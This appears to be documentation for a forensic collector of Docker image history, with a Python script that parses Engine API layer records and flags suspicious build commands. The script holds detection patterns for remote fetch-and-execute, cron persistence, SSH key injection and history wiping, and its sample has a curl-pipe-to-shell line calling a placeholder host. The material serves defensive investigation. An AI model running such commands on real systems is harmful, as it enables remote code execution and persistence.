
Docker Image History

Evidence: Docker Image History
Description: Collect Docker Image History
Category: Applications
Platform: macos
Short Name: dockimagehist
Is Parsed: Yes
Sent to Investigation Hub: Yes
Collect File(s): No

Docker image history shows the layered build steps and commands used to construct an image. This forensic data reveals how an image was built, what software was installed, files added, and configuration changes made during image creation.

This collector gathers structured data about Docker image history.

The collector queries the Docker daemon through the Docker Engine API to retrieve the build history of each image. For every layer in an image's history it extracts the layer ID, creation time, the command that created the layer, the layer size, and any tags.

Image history exposes malicious commands embedded in image layers, such as backdoor installations, credential theft scripts, or cryptominer deployments. Investigators can identify suspicious layers, trace image lineage, and detect tampering or supply chain attacks in containerized environments.
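The following Python script is an added illustration of the two steps described above; it is not the collector's own code. It assumes the record shape returned by the Engine API endpoint `GET /images/{name}/history` (the fields `Id`, `Created`, `CreatedBy`, `Size`, `Tags`, `Comment`), a daemon socket at the default path `/var/run/docker.sock` for the live query, and a small set of example triage heuristics (remote fetch-and-execute pipes, cron and SSH-key writes, shell-history wiping) that an analyst would tune for their own environment. The sample history embedded in the script is constructed so that the parsing and triage run offline.

```python
"""Parse and triage Docker Engine API image-history records (added example)."""
import http.client
import json
import re
import socket
from datetime import datetime, timezone
from typing import Any

DOCKER_SOCKET = "/var/run/docker.sock"  # assumption: default daemon socket path


class _UnixSocketConnection(http.client.HTTPConnection):
    """HTTPConnection that talks to the daemon over its Unix socket."""

    def __init__(self, path: str):
        super().__init__("localhost")
        self._path = path

    def connect(self) -> None:
        self.sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
        self.sock.connect(self._path)


def fetch_history(image: str, sock_path: str = DOCKER_SOCKET) -> list[dict[str, Any]]:
    """Live query of GET /images/{image}/history; needs a running daemon."""
    conn = _UnixSocketConnection(sock_path)
    conn.request("GET", f"/images/{image}/history")
    resp = conn.getresponse()
    body = resp.read()
    conn.close()
    if resp.status != 200:
        raise RuntimeError(f"history query failed: {resp.status} {body!r}")
    return json.loads(body)


def parse_history(raw: list[dict[str, Any]]) -> list[dict[str, Any]]:
    """Normalise each raw record into the fields the collector extracts.

    Intermediate layers that are not stored locally carry the Id "<missing>";
    the value is kept as-is so the analyst can see which layers lack content.
    """
    layers = []
    for entry in raw:
        created = int(entry.get("Created", 0))
        layers.append({
            "layer_id": entry.get("Id", "<missing>"),
            "created": datetime.fromtimestamp(created, tz=timezone.utc).isoformat(),
            "created_by": entry.get("CreatedBy", ""),
            "size": int(entry.get("Size", 0)),
            "tags": entry.get("Tags") or [],
        })
    return layers


# Example heuristics (assumption: not the collector's rules) applied to CreatedBy.
SUSPICIOUS_PATTERNS = (
    ("remote-script-execution", re.compile(r"(curl|wget)[^|]*\|\s*(ba)?sh\b")),
    ("persistence-cron", re.compile(r"/etc/cron|crontab")),
    ("ssh-key-injection", re.compile(r"authorized_keys")),
    ("shell-history-cleared", re.compile(r"rm\s+[^;&|]*bash_history")),
)


def flag_suspicious(layers: list[dict[str, Any]]) -> list[dict[str, Any]]:
    """Return one finding per (layer, pattern) match, keyed by layer index."""
    findings = []
    for idx, layer in enumerate(layers):
        for reason, pattern in SUSPICIOUS_PATTERNS:
            if pattern.search(layer["created_by"]):
                findings.append({"layer_index": idx,
                                 "layer_id": layer["layer_id"],
                                 "reason": reason,
                                 "created_by": layer["created_by"]})
    return findings


def triage_image(raw: list[dict[str, Any]]) -> dict[str, Any]:
    """Parse a history response and summarise it for an investigation report."""
    layers = parse_history(raw)
    return {"layer_count": len(layers),
            "total_size": sum(layer["size"] for layer in layers),
            "tags": sorted({t for layer in layers for t in layer["tags"]}),
            "findings": flag_suspicious(layers)}


# Constructed sample in the daemon's newest-first order (not real image data).
SAMPLE_HISTORY = [
    {"Id": "sha256:bbbb", "Created": 1700000300, "Size": 0, "Tags": ["acme/web:1.0"],
     "CreatedBy": '/bin/sh -c #(nop)  CMD ["nginx"]', "Comment": ""},
    {"Id": "<missing>", "Created": 1700000200, "Size": 120000, "Tags": None,
     "CreatedBy": "/bin/sh -c curl -s http://example.invalid/setup.sh | sh", "Comment": ""},
    {"Id": "<missing>", "Created": 1700000100, "Size": 4200000, "Tags": None,
     "CreatedBy": "/bin/sh -c apk add --no-cache curl", "Comment": ""},
    {"Id": "sha256:aaaa", "Created": 1700000000, "Size": 7300000, "Tags": None,
     "CreatedBy": "/bin/sh -c #(nop) ADD file:abc in /", "Comment": ""},
]

if __name__ == "__main__":
    # Offline run on the constructed sample; swap in fetch_history("acme/web:1.0")
    # on a host with a daemon to triage a real image.
    print(json.dumps(triage_image(SAMPLE_HISTORY), indent=2))
```

The triage output keeps the original `CreatedBy` string next to each finding so an investigator can confirm the match rather than trusting the label; the patterns are deliberately narrow, and a real deployment would add rules for the tooling and base images it expects to see.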